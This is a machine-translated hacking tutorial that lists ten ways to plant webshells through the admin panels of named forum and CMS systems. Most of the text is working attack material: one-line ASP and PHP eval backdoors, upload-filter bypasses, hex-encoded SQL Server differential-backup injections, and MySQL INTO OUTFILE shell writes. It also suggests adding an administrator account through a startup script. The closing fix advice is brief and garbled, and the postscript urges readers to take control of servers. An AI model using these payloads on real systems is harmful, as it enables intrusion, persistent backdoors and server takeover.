1. directly upload and obtain webshell
This is common for PHP and JSP programs. molyx board is one of them, which is used to manage the upload directly in the mood icon. PHP type. Although there is no prompt, it has succeeded. the uploaded file URL should be under http: // forums/images/smiles, A while ago, the JSPs of lianzhong Game Station and Netease could directly upload JSP files. The file name is the original file name. You can directly upload the. php file in the bo-blog background. The file path to be uploaded is prompted. And the popular upfile a year ago. ASP vulnerabilities (mobile network 5.0 and 6.0, many early full-site systems). Due to lax filtering and uploading of files, users can directly upload webshells to any writable directory on the website, in this way, the administrator privilege of the website is obtained.
Ii. Add and modify the upload type
Currently, many script upload modules do not only allow uploading valid file types. Most systems allow adding upload types, while bbsxp supports adding ASA | ASP types in the background, you can also add the ASA type to the backend of the ewebeditor. After modification, you can directly upload the webshell with the ASA suffix. Another case is to filter out. ASP, you can add. aspasp file type to upload and obtain webshell. PHP system background, we can add. PHP. the upload type of g1f, which is a feature of PHP. As long as it is not a known file type, PHP will. g1f. PHP to run normally, and thus the shell can be obtained successfully. Leadbbs3.14 the webshell method obtained in the background is: Add ASP to the upload type. Note that there is a space behind ASP, and then upload ASP horse on the front end. Of course, a space should also be added to the back end!
3. Use the background management function to write data to webshell
The upload vulnerability is almost supplemented. Therefore, after entering the background, you can modify the relevant files to write them to webshell. Typical examples include dvbbs6.0 and leadbbs2.88. You can directly modify the configuration file in the background and write files with the suffix ASP. Another way for leadbbs3.14 to obtain webshell in the background is to add a new friendship link and write the lihu min horse in the website name. You can enter some characters before and after the min horse, http: // website/INC/inchtm/boardlink. ASP is the shell we want.
4. Use background management to write webshells to the configuration file
Use symbols such as ":" "//" to construct the configuration file of the minimal horse Write Program, the joekoe forum, the transcript of a specific role, the news system, and the COCOON Counter statistics program, there are also a lot of php programs, COCOON Counter statistical program example, In the management mailbox to add cnhacker@263.net ": eval request (chr (35 ))//, webmail = "cnhacker@263.net/": eval request (chr (35 ))//", another way is to write the cnhacker@263.net "%> <% eval request (chr (35) %> <% ', so that the formation of the corresponding front and back, the minimum horse will run. <% Eval request (chr (35) %> you can use the eval sender of lake2 and the latest 2006 client to connect. It must be noted that you must select the former when inserting a database horse. For another example, go to document center management> top menu settings> menu other special effects and insert a sentence "%> <% execute request (" l ") %> <% ', after the menu parameters of the top menu bar are successfully set, we will get the trojan address http: // website/admin/rootclass_menu_config.asp.
5. Use background database backup and recovery to obtain webshell
It mainly uses the "backup database" or "Recover Database" function of the access database in the background, and does not filter variables such as "backup database path", so that any file suffix can be changed to asp, to obtain the webshell, The msssql program directly applies the access code, so that the SQL version can still be used. You can also view and obtain the source code of the web page, and obtain more program information to obtain webshell. In practical use, we often encounter the absence of the upload function, but some asp systems are running. This method is used to view the source code to obtain the location of the database, which creates an opportunity for database insertion, the Internet forum has a database with an ip address. You can insert the smallest trojan in the ip address management in the background and back it up. asp file. After talking about how to break through the upload detection method, many asp programs will prompt that the file is invalid even after the suffix is changed. add gif89a to the asp file header and change the suffix to gif to cheat asp program detection to achieve the purpose of uploading. Also, use NotePad to open the image file and copy part of it to the asp Trojan file header, after you modify the gif suffix, you can also upload the file without detection, and then back up the file. asp file. webshell is obtained successfully.
Vi. Use the database compression function
It can prevent downloading data failure so that the smallest horse inserted into the database successfully run, a typical is loveyuki L-BLOG, enter <% eval request (chr (35) %> in the url added in the Link. After submission, compress the database in the database operation and compress the database. asp file. You can use the eval client of the smallest horse in the ocean to connect to a webshell.
VII. asp + mssql System
Here, you need to mention the dynamic network mssql version, but you can directly submit it locally for backup. First, upload a fake image with asp code in the post, and remember its upload path. Write a form submitted locally. The Code is as follows:
<Form action = http: // website/bbs/admin_data.asp? Action = RestoreData & act = Restore method = "post">
<P> location of the uploaded file: <input name = "Dbpath" type = "text" size = "80"> </p>
<P> location to be copied: <input name = "backpath" type = "text" size = "80"> </p>
<P> <input type = "submit" value = "submit"> </p> </form>
Running is local execution of .htm. Fill in the path for uploading fake images in "Location of uploaded files", fill in the relative path of the WebShell to be backed up in "location to be copied", and submit the file to get our lovely WebShell, the recovery code is similar to this. You can modify the relevant code. I have never encountered any background asp program that executes mssql commands in the background. The restoration and backup of the database on the Internet are a decoration. I cannot run SQL commands to back up webshell, but can only execute some simple query commands. Mssql injection can be used to inject differential backup webshell. Generally, the absolute path is displayed in the backend, and the differential backup is successful if there is an injection point. To obtain the database name.
Code for differential backup:
; Declare @ a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x626273 backup database @ a to disk = @ s --
; Drop table [heige]; create table [dbo]. [heige] ([cmd] [image]) --
; Insert into heige (cmd) values (0x3c2565786563757213201095717565737428226c2229253e )--
; Declare @ a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x643A5C7765625C312E617370 backup database @ a to disk = @ s with differential, FORMAT --
In this Code, 0x626273 is the hexadecimal System of the database name bbs to be backed up. It can be another name such as bbs. bak; percent is the hexadecimal value of <% execute request ("l") %>, which is the smallest lp horse; 0x643A5C7765625C312E617370 is d:/web/1. the hexadecimal format of asp, that is, the webshell path you want to back up. Of course, you can also use a common backup method to obtain webshell. The only drawback is that the file after backup is too large. If the backup database has a data table that prevents downloading, or has an incorrect asp code, the backed-up webshell won't run successfully. Differential backup is a method with a high success rate and greatly reduces the size of the backup file.
8. php + mysql System
The mysql data query function is required in the background, and we can use it to execute SELECT... into outfile: Query and output the PHP file. Because all the data is stored in mysql, We can insert our webshell code INTO mysql by using normal means... the into outfile statement exports the shell. In the mysql operation, enter select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql. user into outfile 'path' To Get A <? Eval ($ _ POST [a]);?> The smallest horse
'
0x3C3F6576616C28245F504F53545B615D293B3F3E is ours <? Eval ($ _ POST [a]);?> This method is more common for phpmyadmin. First, the phpmyadmin path leakage vulnerability is exploited. A typical example is http: // url/phpmyadmin/libraries/select_lang.lib.php.
You can obtain the absolute path in the php environment :). It is mentioned that mysql should write d: // wwwroot/a. php In the win system path. The following method is a commonly used method for exporting webshells. You can also write a vbs script to add the system administrator and export it to the Startup Folder. After the system restarts, an administrator account will be added.
Create table a (cmd text not null)
Insert into a (cmd) VALUES ('<? Fputs (fopen ("./a. php", "w"), "<? Eval (/$ _ POST [a]);?> ")?> ')
Select cmd from a into outfile 'path/B. php'
Drop table if exists
When you access B. php, A <? Eval ($ _ POST [a]);?> The smallest horse.
If you can execute php Command is much simpler, the typical representative is the BO-BLOG, in the background of the php Command box enter the following code:
<?
$ Sa = fopen ("./up/saiy. php", "w ");
Fwrite ($ sa, "<? Eval (/$ _ POST [a]);? "."> ");
Fclose ($ sa );
?>
The file named saiy. php is generated in the up directory. The content is <? Eval ($ _ POST [a]);?> The smallest php Trojan,
Finally, use the lanker client to connect. In actual use, whether the folder has write permission should be considered. Or enter such code <? Fputs (fopen ("./a. php", "w"), "<? Eval (/$ _ POST [a]);?> ")?> A. php minimal Trojan will be generated in the current directory.
IX. Three Methods for phpwind Forum from backend to webshell
Method 1 Template Method
Enter the background, set the style template, and write code in any line. Remember, this code must be written in the left line, and there cannot be any character in front of the Code.
EOT;
Eval ($ );
Print <EOT
Then we get a shell: http: // website/bbs/index. php.
Method for filtering the first two swear words
Go to security management ◇ bad word filtering. Add a bad word to write a '] = 'a'; eval ($ _ POST ['a']); //
Replace it with a shell address that can be written at will, and then get a shell address that is http: // website/bbs/data/bbscache/wordsfb. php.
Method 3 user level management
Create a new member group. You can write the title at will, but do not write special symbols for single double quotes. Upgrade the image number to a'; eval ($ _ POST ['a']); // The number of update points can still be written at will. Then we get a shell address: http: // website/bbs/data/bbscache/level. php.
In the preceding three methods, the webshellr password is a, which is a backdoor server of lanker.
10. You can also use the website access count system record to obtain webshell
The most obvious difference is that a Jiang counting program in a private server can use http: // website/stat. asp? Style = text & referer = Code content & screenwidth = 1024 directly submit, you can directly Insert the code content into the database of the counting system, and the default database of this system is count #. asa, we can use http: // website/count % 23. after accessing the asa, obtain webshell. Because the Alibaba Cloud counting program filters % and +, change the minimal horse to <script runat = server language = vbSCRIPT> eval (Request ("1 ")) </SCRIPT> Replace the code content for submission and use the eval client of lake2 to submit the code. It is worth mentioning that if you enter the counting background, you can clear the data at a certain moment, once an asp Trojan fails to be inserted, you can clean up the database and perform another operation.
Solution
Because this article involves many code versions, it is impossible to provide a perfect solution. Attackers can fix the vulnerability files mentioned in this Article. If the vulnerability files do not affect system usage, they can also delete the files. If you do not fix the patch, you can download the latest patch on the relevant official website to fix it. You can also keep an eye on the latest announcements released by major security networks. If you discover any vulnerabilities, You can notify the official website in a timely manner.
Postscript
In fact, there should be a lot of skills to get webshell from the background. The key is to see how you can use it flexibly and use it in a similar way. I hope the methods in this article can play a leading role. Come on, let's get the server under control!